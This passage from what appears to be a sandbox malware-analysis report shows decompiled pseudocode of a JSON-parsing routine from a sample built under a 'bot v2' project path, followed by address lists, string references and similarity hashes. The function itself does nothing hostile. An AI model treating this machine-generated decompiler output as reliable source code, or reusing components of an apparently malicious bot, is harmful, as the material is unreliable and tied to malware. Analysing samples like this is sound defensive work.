													 *(_t875 - 0x380) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x374)), _t873, _t874, _t875 - 0x25c);
													 *((intOrPtr*)(_t875 - 0x378)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x384)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x378)), _t875 - 0x4f8));
													_t837 =  *(_t875 - 0x380);
													 *((char*)(_t875 - 0x2d3)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x384)),  *(_t875 - 0x380),  *((intOrPtr*)(_t875 - 0x37c)));
													E00416980(_t875 - 0x25c);
													E00416D90(_t875 - 0x684);
													E00416980(_t875 - 0x274);
													E00416980(_t875 - 0xac);
													E00416950(_t875 - 0x4ac);
													E00416CE0(_t875 - 0x2bc);
													_t471 =  *((intOrPtr*)(_t875 - 0x2d3));
												}
											} else {
												L67:
												 *((char*)(_t875 - 0x2d2)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2d2));
											}
										} else {
											L65:
											 *((intOrPtr*)(_t875 - 0x344)) = E00414FA0(_t875 - 0x49c, 0);
											E00415310(_t875 - 0x94, __eflags, "object key");
											 *((intOrPtr*)(_t875 - 0x348)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x244, 4, _t875 - 0x94);
											 *((intOrPtr*)(_t875 - 0x340)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x34c)) = E00420140( *((intOrPtr*)(_t875 - 0x340)), _t875 - 0x4d4);
											 *((intOrPtr*)(_t875 - 0x358)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x664, 0x65,  *((intOrPtr*)(_t875 - 0x34c)),  *((intOrPtr*)(_t875 - 0x348)),  *((intOrPtr*)(_t875 - 0x344)));
											 *((intOrPtr*)(_t875 - 0x350)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x35c)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x350)), _t873, _t874, _t875 - 0x22c);
											 *((intOrPtr*)(_t875 - 0x354)) =  *(_t875 - 0x2a8) + 0x30;
											 *(_t875 - 0x360) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x354)), _t875 - 0x4e0));
											_t837 =  *(_t875 - 0x360);
											 *((char*)(_t875 - 0x2d1)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x360),  *((intOrPtr*)(_t875 - 0x35c)),  *((intOrPtr*)(_t875 - 0x358)));
											E00416980(_t875 - 0x22c);
											E00416D90(_t875 - 0x664);
											E00416980(_t875 - 0x244);
											E00416980(_t875 - 0x94);
											E00416950(_t875 - 0x49c);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d1));
										}
									}
								} else {
									L54:
									_t554 = E00420190( *(_t875 - 0x2a8));
									__eflags = _t554 - 0xd;
									if(_t554 != 0xd) {
										L56:
										_t837 =  *(_t875 - 0x2a8);
										__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 0xa;
										if(__eflags != 0) {
											L62:
											 *((intOrPtr*)(_t875 - 0x320)) = E00414FA0(_t875 - 0x48c, 0);
											E00415310(_t875 - 0x1c, __eflags, "array");
											 *((intOrPtr*)(_t875 - 0x324)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x214, 0xa, _t875 - 0x1c);
											 *((intOrPtr*)(_t875 - 0x31c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x328)) = E00420140( *((intOrPtr*)(_t875 - 0x31c)), _t875 - 0x588);
											 *((intOrPtr*)(_t875 - 0x334)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x644, 0x65,  *((intOrPtr*)(_t875 - 0x328)),  *((intOrPtr*)(_t875 - 0x324)),  *((intOrPtr*)(_t875 - 0x320)));
											 *((intOrPtr*)(_t875 - 0x32c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x338)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x32c)), _t873, _t874, _t875 - 0xdc);
											 *((intOrPtr*)(_t875 - 0x330)) =  *(_t875 - 0x2a8) + 0x30;
											 *(_t875 - 0x33c) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x330)), _t875 - 0x4c8));
											_t837 =  *(_t875 - 0x33c);
											 *((char*)(_t875 - 0x2d0)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x33c),  *((intOrPtr*)(_t875 - 0x338)),  *((intOrPtr*)(_t875 - 0x334)));
											E00416980(_t875 - 0xdc);
											E00416D90(_t875 - 0x644);
											E00416980(_t875 - 0x214);
											E00416980(_t875 - 0x1c);
											E00416950(_t875 - 0x48c);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d0));
										} else {
											L57:
											_t575 = E0041F160( *((intOrPtr*)(_t875 + 8)), __eflags);
											__eflags = _t575 & 0x000000ff;
											if((_t575 & 0x000000ff) != 0) {
												L59:
												__eflags = E0041EDD0(_t875 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2b6b);
													E00430DB7(_t651, _t837, _t873, _t874, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t877 = _t877 + 0xc;
												}
												E00421D70(_t875 - 0x2bc, __eflags);
												 *(_t875 - 0x2a9) = 1;
												goto L1;
											} else {
												L58:
												 *((char*)(_t875 - 0x2cf)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2cf));
											}
										}
									} else {
										L55:
										E00420190( *(_t875 - 0x2a8));
										L1:
										while(1 != 0) {
											if(( *(_t875 - 0x2a9) & 0x000000ff) != 0) {
												L50:
												 *(_t875 - 0x2a9) = 0;
												goto L51;
											} else {
												L3:
												_t837 =  *(_t875 - 0x2a8);
												 *(_t875 - 0x2dc) =  *( *(_t875 - 0x2a8) + 0x28);
												if( *(_t875 - 0x2dc) > 0x10) {
													L48:
													 *((intOrPtr*)(_t875 - 0x2fc)) = E00414FA0(_t875 - 0x47c, 0);
													E00415310(_t875 - 0x7c, __eflags, "value");
													 *((intOrPtr*)(_t875 - 0x300)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x1fc, 0x10, _t875 - 0x7c);
													 *((intOrPtr*)(_t875 - 0x2f8)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x304)) = E00420140( *((intOrPtr*)(_t875 - 0x2f8)), _t875 - 0x570);
													 *(_t875 - 0x310) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x624, 0x65,  *((intOrPtr*)(_t875 - 0x304)),  *((intOrPtr*)(_t875 - 0x300)),  *((intOrPtr*)(_t875 - 0x2fc)));
													 *((intOrPtr*)(_t875 - 0x308)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x314)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x308)), _t873, _t874, _t875 - 0x1e4);
													 *((intOrPtr*)(_t875 - 0x30c)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x318)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x30c)), _t875 - 0x57c));
													_t837 =  *(_t875 - 0x310);
													 *((char*)(_t875 - 0x2cd)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x318)),  *((intOrPtr*)(_t875 - 0x314)),  *(_t875 - 0x310));
													E00416980(_t875 - 0x1e4);
													E00416D90(_t875 - 0x624);
													E00416980(_t875 - 0x1fc);
													E00416980(_t875 - 0x7c);
													E00416950(_t875 - 0x47c);
													E00416CE0(_t875 - 0x2bc);
													_t471 =  *((intOrPtr*)(_t875 - 0x2cd));
												} else {
													L4:
													switch( *((intOrPtr*)( *(_t875 - 0x2dc) * 4 +  &M00414624))) {
														case 0:
															goto L48;
														case 1:
															L35:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF60( *(__ebp + 8), 1);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L37:
																goto L49;
															} else {
																L36:
																 *((char*)(__ebp - 0x2c8)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c8));
															}
															goto L79;
														case 2:
															L29:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF60(__ecx, 0);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L31:
																goto L49;
															} else {
																L30:
																 *((char*)(__ebp - 0x2c6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c6));
															}
															goto L79;
														case 3:
															L32:
															__ecx =  *(__ebp + 8);
															E004216C0(__ecx) = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L34:
																goto L49;
															} else {
																L33:
																 *((char*)(__ebp - 0x2c7)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c7));
															}
															goto L79;
														case 4:
															L41:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
															__ecx =  *(__ebp + 8);
															__eax = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L43:
																goto L49;
															} else {
																L42:
																 *((char*)(__ebp - 0x2ca)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2ca));
															}
															goto L79;
														case 5:
															L44:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420100( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E004217C0( *(__ebp + 8), __eax);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L46:
																goto L49;
															} else {
																L45:
																 *((char*)(__ebp - 0x2cb)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2cb));
															}
															goto L79;
														case 6:
															L38:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200E0( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421770(__ecx, __eax);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L40:
																goto L49;
															} else {
																L39:
																 *((char*)(__ebp - 0x2c9)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c9));
															}
															goto L79;
														case 7:
															L24:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200C0(__ecx);
															 *((long long*)(__ebp - 0x424)) = __fp0;
															__esp = __esp - 8;
															asm("movsd xmm0, [ebp-0x424]");
															asm("movsd [esp], xmm0");
															__eax = E00411E30(__ecx);
															__esp = __esp + 8;
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L26:
																__ecx =  *(__ebp - 0x2a8);
																__ecx =  *(__ebp - 0x2a8) + 0x30;
																__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
																__esp = __esp - 8;
																asm("movsd xmm0, [ebp-0x424]");
																asm("movsd [esp], xmm0");
																__ecx =  *(__ebp + 8);
																__eax = E00421720( *(__ebp + 8), __eax);
																__ecx = __al & 0x000000ff;
																__eflags = __ecx;
																if(__ecx != 0) {
																	L28:
																	goto L49;
																} else {
																	L27:
																	 *((char*)(__ebp - 0x2c5)) = 0;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00416CE0(__ecx);
																	__al =  *((intOrPtr*)(__ebp - 0x2c5));
																}
															} else {
																L25:
																__ecx = __ebp - 0x45c;
																 *(__ebp - 0x3f8) = E00414FA0(__ebp - 0x45c, 0);
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x3f4) =  *(__ebp - 0x2a8) + 0x30;
																__eax = __ebp - 0x19c;
																__ecx =  *(__ebp - 0x3f4);
																__eax = E004201C0(__ebx,  *(__ebp - 0x3f4), __edi, __esi, __ebp - 0x19c);
																__ecx = __ebp - 0xf4;
																__eax = E00406320(__eflags, __ebp - 0xf4, "number overflow parsing \'", __eax);
																__edx = __ebp - 0x184;
																 *(__ebp - 0x3fc) = __eax;
																__eax =  *(__ebp - 0x3f8);
																__ecx =  *(__ebp - 0x3fc);
																__edx = __ebp - 0x5a4;
																 *(__ebp - 0x408) = E0040C390(__ebx, __edi, __esi, __eflags, __ebp - 0x5a4, 0x196,  *(__ebp - 0x3fc),  *(__ebp - 0x3f8));
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x400) =  *(__ebp - 0x2a8) + 0x30;
																__ecx = __ebp - 0x16c;
																__ecx =  *(__ebp - 0x400);
																 *(__ebp - 0x40c) = E004201C0(__ebx,  *(__ebp - 0x400), __edi, __esi, __ebp - 0x16c);
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x404) =  *(__ebp - 0x2a8) + 0x30;
																__eax = __ebp - 0x54c;
																__ecx =  *(__ebp - 0x404);
																__ecx = E00420140( *(__ebp - 0x404), __ebp - 0x54c);
																 *(__ebp - 0x410) = __eax;
																__ecx =  *(__ebp - 0x408);
																__edx =  *(__ebp - 0x40c);
																__eax =  *(__ebp - 0x410);
																__ecx =  *(__ebp + 8);
																__eax = E00412130( *(__ebp + 8),  *(__ebp - 0x410),  *(__ebp - 0x40c),  *(__ebp - 0x408));
																 *(__ebp - 0x2c4) = __al;
																__ecx = __ebp - 0x16c;
																__eax = E00416980(__ebp - 0x16c);
																__ecx = __ebp - 0x5a4;
																__eax = E00416D90(__ebp - 0x5a4);
																__ecx = __ebp - 0x184;
																__eax = E00416980(__ebp - 0x184);
																__ecx = __ebp - 0xf4;
																__eax = E00416980(__ebp - 0xf4);
																__ecx = __ebp - 0x19c;
																__eax = E00416980(__ebp - 0x19c);
																__ecx = __ebp - 0x45c;
																__eax = E00416950(__ebp - 0x45c);
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *(__ebp - 0x2c4);
															}
															goto L79;
														case 8:
															L17:
															__ecx =  *(__ebp + 8);
															__eax = E00424150(__ebx,  *(__ebp + 8), __edi, __esi, 0xffffffff);
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L19:
																__ecx =  *(__ebp - 0x2a8);
																__eflags = E00420190( *(__ebp - 0x2a8)) - 0xa;
																if(__eflags != 0) {
																	L23:
																	 *(__ebp - 0x2c3) = 1;
																	__eax = __ebp - 0x2c3;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00422090(__ecx, __ebp - 0x2c3);
																	goto L1;
																} else {
																	L20:
																	__ecx =  *(__ebp + 8);
																	__eax = E0041F160(__ecx, __eflags);
																	__edx = __al & 0x000000ff;
																	__eflags = __edx;
																	if(__edx != 0) {
																		L22:
																		goto L49;
																	} else {
																		L21:
																		 *((char*)(__ebp - 0x2c2)) = 0;
																		__ecx = __ebp - 0x2bc;
																		__eax = E00416CE0(__ecx);
																		__al =  *((intOrPtr*)(__ebp - 0x2c2));
																	}
																}
															} else {
																L18:
																 *((char*)(__ebp - 0x2d6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2d6));
															}
															goto L79;
														case 9:
															goto L0;
														case 0xa:
															L47:
															__ecx = __ebp - 0x46c;
															 *(__ebp - 0x418) = E00414FA0(__ebp - 0x46c, 0);
															__ecx = __ebp - 0x64;
															__eax = E00415310(__ebp - 0x64, __eflags, "value");
															__edx = __ebp - 0x64;
															__eax = __ebp - 0x1cc;
															__ecx =  *(__ebp - 0x2a8);
															 *(__ebp - 0x41c) = E0041F5F0(__ebx,  *(__ebp - 0x2a8), __edi, __esi, __eflags, __ebp - 0x1cc, 0, __ebp - 0x64);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x414) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x558;
															__ecx =  *(__ebp - 0x414);
															 *(__ebp - 0x2e0) = E00420140( *(__ebp - 0x414), __ebp - 0x558);
															__eax =  *(__ebp - 0x418);
															__ecx =  *(__ebp - 0x41c);
															__edx =  *(__ebp - 0x2e0);
															__eax = __ebp - 0x604;
															 *(__ebp - 0x2ec) = E0040C460(__ebx, __edi, __esi, __eflags, __ebp - 0x604, 0x65,  *(__ebp - 0x2e0),  *(__ebp - 0x41c),  *(__ebp - 0x418));
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e4) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x1b4;
															__ecx =  *(__ebp - 0x2e4);
															 *(__ebp - 0x2f0) = E004201C0(__ebx,  *(__ebp - 0x2e4), __edi, __esi, __ebp - 0x1b4);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e8) =  *(__ebp - 0x2a8) + 0x30;
															__ecx = __ebp - 0x564;
															__ecx =  *(__ebp - 0x2e8);
															__ecx = E00420140( *(__ebp - 0x2e8), __ebp - 0x564);
															 *(__ebp - 0x2f4) = __eax;
															__edx =  *(__ebp - 0x2ec);
															__eax =  *(__ebp - 0x2f0);
															__ecx =  *(__ebp - 0x2f4);
															__ecx =  *(__ebp + 8);
															__eax = E00412130( *(__ebp + 8),  *(__ebp - 0x2f4),  *(__ebp - 0x2f0),  *(__ebp - 0x2ec));
															 *(__ebp - 0x2cc) = __al;
															__ecx = __ebp - 0x1b4;
															__eax = E00416980(__ebp - 0x1b4);
															__ecx = __ebp - 0x604;
															__eax = E00416D90(__ebp - 0x604);
															__ecx = __ebp - 0x1cc;
															__eax = E00416980(__ebp - 0x1cc);
															__ecx = __ebp - 0x64;
															__eax = E00416980(__ebp - 0x64);
															__ecx = __ebp - 0x46c;
															__eax = E00416950(__ebp - 0x46c);
															__ecx = __ebp - 0x2bc;
															__eax = E00416CE0(__ecx);
															__al =  *(__ebp - 0x2cc);
															goto L79;
													}
												}
											}
											goto L79;
										}
										_t471 = E00416CE0(_t875 - 0x2bc);
									}
								}
							} else {
								L52:
								 *((char*)(_t875 - 0x2ce)) = 1;
								E00416CE0(_t875 - 0x2bc);
								_t471 =  *((intOrPtr*)(_t875 - 0x2ce));
							}
						} else {
							L8:
							 *((char*)(_t875 - 0x2bd)) = 0;
							E00416CE0(_t875 - 0x2bc);
							_t471 =  *((intOrPtr*)(_t875 - 0x2bd));
						}
					}
					L79:
					return E00424900(_t471, _t651,  *(_t875 - 4) ^ _t875, _t837, _t873, _t874);
					L80:
				}
				L5:
				 *((char*)(_t875 - 0x2d7)) = 0;
				E00416CE0(_t875 - 0x2bc);
				_t471 =  *((intOrPtr*)(_t875 - 0x2d7));
				goto L79;
			}

0x004134a0
0x004134a0
0x004134a0
0x004134a0
0x004134a0
0x004134a0
0x004134a5
0x004134aa
0x004134af
0x00000000
0x00000000
0x004134ce
0x004134d9
0x004134dc
0x0041350f
0x00413515
0x00413519
0x00413672
0x00413684
0x00413689
0x0041368c
0x0041368e
0x004136ad
0x004136b8
0x004136bb
0x00413814
0x00413814
0x00413828
0x00413833
0x00000000
0x004136c1
0x004136c1
0x004136ce
0x004136dc
0x004136f9
0x00413708
0x00413720
0x0041374c
0x0041375b
0x00413773
0x00413782
0x004137a1
0x004137b5
0x004137c4
0x004137d0
0x004137db
0x004137e6
0x004137ee
0x004137f9
0x00413804
0x00413809
0x00413809
0x00413690
0x00413690
0x00413690
0x0041369d
0x004136a2
0x004136a2
0x0041351f
0x0041351f
0x0041352c
0x0041353a
0x00413557
0x00413566
0x0041357e
0x004135aa
0x004135b9
0x004135d1
0x004135e0
0x004135ff
0x00413605
0x00413622
0x0041362e
0x00413639
0x00413644
0x0041364c
0x00413657
0x00413662
0x00413667
0x00413667
0x004134de
0x004134de
0x004134e1
0x004134e9
0x004134eb
0x0041350a
0x00413eac
0x00413eb5
0x00413ebb
0x00413ec0
0x00413ec3
0x00413ec5
0x00413ee4
0x00413ef8
0x00413f00
0x00413f02
0x004140f3
0x004140f9
0x004140fe
0x00414101
0x00414432
0x00414438
0x0041443c
0x004144aa
0x004144b7
0x004144c8
0x004144e8
0x004144f7
0x0041450f
0x0041453b
0x0041454a
0x00414562
0x00414571
0x00414590
0x00414596
0x004145b3
0x004145bf
0x004145ca
0x004145d5
0x004145e0
0x004145eb
0x004145f6
0x004145fb
0x0041443e
0x0041443e
0x00414441
0x00414446
0x00414449
0x0041444b
0x0041446a
0x00414478
0x0041447a
0x0041447c
0x0041448b
0x00414490
0x00414490
0x00414499
0x0041449e
0x00000000
0x0041444d
0x0041444d
0x0041444d
0x0041445a
0x0041445f
0x0041445f
0x0041444b
0x00414107
0x00414107
0x00414112
0x00414115
0x00414277
0x00414289
0x00414291
0x00414293
0x004142b2
0x004142bd
0x004142c0
0x00414422
0x00414428
0x00000000
0x004142c6
0x004142c6
0x004142d3
0x004142e4
0x00414304
0x00414313
0x0041432b
0x00414357
0x00414366
0x0041437e
0x0041438d
0x004143ac
0x004143b9
0x004143cf
0x004143db
0x004143e6
0x004143f1
0x004143fc
0x00414407
0x00414412
0x00414417
0x00414417
0x00414295
0x00414295
0x00414295
0x004142a2
0x004142a7
0x004142a7
0x0041411b
0x0041411b
0x00414128
0x00414139
0x00414159
0x00414168
0x00414180
0x004141ac
0x004141bb
0x004141d3
0x004141e2
0x00414201
0x00414215
0x00414224
0x00414230
0x0041423b
0x00414246
0x00414251
0x0041425c
0x00414267
0x0041426c
0x0041426c
0x00414115
0x00413f08
0x00413f08
0x00413f0e
0x00413f13
0x00413f16
0x00413f28
0x00413f28
0x00413f2e
0x00413f32
0x00413fa0
0x00413fad
0x00413fbb
0x00413fd8
0x00413fe7
0x00413fff
0x0041402b
0x0041403a
0x00414052
0x00414061
0x00414080
0x00414094
0x004140a3
0x004140af
0x004140ba
0x004140c5
0x004140cd
0x004140d8
0x004140e3
0x004140e8
0x00413f34
0x00413f34
0x00413f37
0x00413f3f
0x00413f41
0x00413f60
0x00413f6e
0x00413f70
0x00413f72
0x00413f81
0x00413f86
0x00413f86
0x00413f8f
0x00413f94
0x00000000
0x00413f43
0x00413f43
0x00413f43
0x00413f50
0x00413f55
0x00413f55
0x00413f41
0x00413f18
0x00413f18
0x00413f1e
0x00000000
0x0041345b
0x00413471
0x00413eae
0x00413eae
0x00000000
0x00413477
0x00413477
0x00413477
0x00413480
0x0041348d
0x00413d59
0x00413d66
0x00413d74
0x00413d91
0x00413da0
0x00413db8
0x00413de4
0x00413df3
0x00413e0b
0x00413e1a
0x00413e39
0x00413e3f
0x00413e5c
0x00413e68
0x00413e73
0x00413e7e
0x00413e86
0x00413e91
0x00413e9c
0x00413ea1
0x00413493
0x00413493
0x00413499
0x00000000
0x00000000
0x00000000
0x00413b11
0x00413b13
0x00413b16
0x00413b1b
0x00413b1e
0x00413b20
0x00413b3f
0x00000000
0x00413b22
0x00413b22
0x00413b22
0x00413b29
0x00413b2f
0x00413b34
0x00413b34
0x00000000
0x00000000
0x00413aad
0x00413aaf
0x00413ab2
0x00413ab7
0x00413aba
0x00413abc
0x00413adb
0x00000000
0x00413abe
0x00413abe
0x00413abe
0x00413ac5
0x00413acb
0x00413ad0
0x00413ad0
0x00000000
0x00000000
0x00413ae0
0x00413ae0
0x00413ae8
0x00413aeb
0x00413aed
0x00413b0c
0x00000000
0x00413aef
0x00413aef
0x00413aef
0x00413af6
0x00413afc
0x00413b01
0x00413b01
0x00000000
0x00000000
0x00413b85
0x00413b85
0x00413b8b
0x00413b8e
0x00413b94
0x00413b9c
0x00413b9f
0x00413ba1
0x00413bc0
0x00000000
0x00413ba3
0x00413ba3
0x00413ba3
0x00413baa
0x00413bb0
0x00413bb5
0x00413bb5
0x00000000
0x00000000
0x00413bc5
0x00413bc5
0x00413bcb
0x00413bce
0x00413bd3
0x00413bd5
0x00413bd8
0x00413bdd
0x00413be0
0x00413be2
0x00413c01
0x00000000
0x00413be4
0x00413be4
0x00413be4
0x00413beb
0x00413bf1
0x00413bf6
0x00413bf6
0x00000000
0x00000000
0x00413b44
0x00413b44
0x00413b4a
0x00413b4d
0x00413b52
0x00413b54
0x00413b57
0x00413b5c
0x00413b5f
0x00413b61
0x00413b80
0x00000000
0x00413b63
0x00413b63
0x00413b63
0x00413b6a
0x00413b70
0x00413b75
0x00413b75
0x00000000
0x00000000
0x004138ca
0x004138ca
0x004138d0
0x004138d3
0x004138d8
0x004138de
0x004138e1
0x004138e9
0x004138ee
0x004138f3
0x004138f6
0x004138f9
0x004138fb
0x00413a5d
0x00413a5d
0x00413a63
0x00413a66
0x00413a6c
0x00413a6f
0x00413a77
0x00413a7c
0x00413a7f
0x00413a84
0x00413a87
0x00413a89
0x00413aa8
0x00000000
0x00413a8b
0x00413a8b
0x00413a8b
0x00413a92
0x00413a98
0x00413a9d
0x00413a9d
0x00413901
0x00413901
0x00413903
0x0041390e
0x0041391a
0x0041391d
0x00413928
0x0041392f
0x00413935
0x00413940
0x00413947
0x00413950
0x0041395f
0x00413965
0x0041396c
0x00413978
0x00413987
0x00413993
0x00413996
0x0041399c
0x004139a3
0x004139ae
0x004139ba
0x004139bd
0x004139c3
0x004139ca
0x004139d5
0x004139dc
0x004139e2
0x004139e9
0x004139f0
0x004139f7
0x004139fa
0x004139ff
0x00413a05
0x00413a0b
0x00413a10
0x00413a16
0x00413a1b
0x00413a21
0x00413a26
0x00413a2c
0x00413a31
0x00413a37
0x00413a3c
0x00413a42
0x00413a47
0x00413a4d
0x00413a52
0x00413a52
0x00000000
0x00000000
0x0041383d
0x0041383f
0x00413842
0x00413847
0x0041384a
0x0041384c
0x0041386b
0x0041386b
0x00413876
0x00413879
0x004138ac
0x004138ac
0x004138b3
0x004138ba
0x004138c0
0x00000000
0x0041387b
0x0041387b
0x0041387b
0x0041387e
0x00413883
0x00413886
0x00413888
0x004138a7
0x00000000
0x0041388a
0x0041388a
0x0041388a
0x00413891
0x00413897
0x0041389c
0x0041389c
0x00413888
0x0041384e
0x0041384e
0x0041384e
0x00413855
0x0041385b
0x00413860
0x00413860
0x00000000
0x00000000
0x00000000
0x00000000
0x00413c06
0x00413c08
0x00413c13
0x00413c1e
0x00413c21
0x00413c26
0x00413c2c
0x00413c33
0x00413c3e
0x00413c4a
0x00413c4d
0x00413c53
0x00413c5a
0x00413c65
0x00413c6b
0x00413c72
0x00413c79
0x00413c82
0x00413c91
0x00413c9d
0x00413ca0
0x00413ca6
0x00413cad
0x00413cb8
0x00413cc4
0x00413cc7
0x00413ccd
0x00413cd4
0x00413cdf
0x00413ce6
0x00413cec
0x00413cf3
0x00413cfa
0x00413d01
0x00413d04
0x00413d09
0x00413d0f
0x00413d15
0x00413d1a
0x00413d20
0x00413d25
0x00413d2b
0x00413d30
0x00413d33
0x00413d38
0x00413d3e
0x00413d43
0x00413d49
0x00413d4e
0x00000000
0x00000000
0x00413499
0x0041348d
0x00000000
0x00413471
0x0041460e
0x0041460e
0x00413f16
0x00413ec7
0x00413ec7
0x00413ec7
0x00413ed4
0x00413ed9
0x00413ed9
0x004134ed
0x004134ed
0x004134ed
0x004134fa
0x004134ff
0x004134ff
0x004134eb
0x00414613
0x00414620
0x00000000
0x00414620
0x004134b1
0x004134b1
0x004134be
0x004134c3
0x00000000

Strings

object separator, xrefs: 004136D4
object key, xrefs: 00413532

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID: object key$object separator
API String ID: 0-2279923633
Opcode ID: 229e6dccb904c795882235a392c3b1b3736ec8ef2485c9e3ed6ef9dd9ab26a0f
Instruction ID: 38bd808d2af66e1fde28e643f16c632f582a06bad1d0a5e37291d1760bb17d14
Opcode Fuzzy Hash: 229e6dccb904c795882235a392c3b1b3736ec8ef2485c9e3ed6ef9dd9ab26a0f
Instruction Fuzzy Hash: 9EA14B70A101289FCB29EB15DC91BEEB7B9AF44304F5041DEA10AA7292DB345FC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D110 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 203
memoryCOMMON

Download Yara Rule

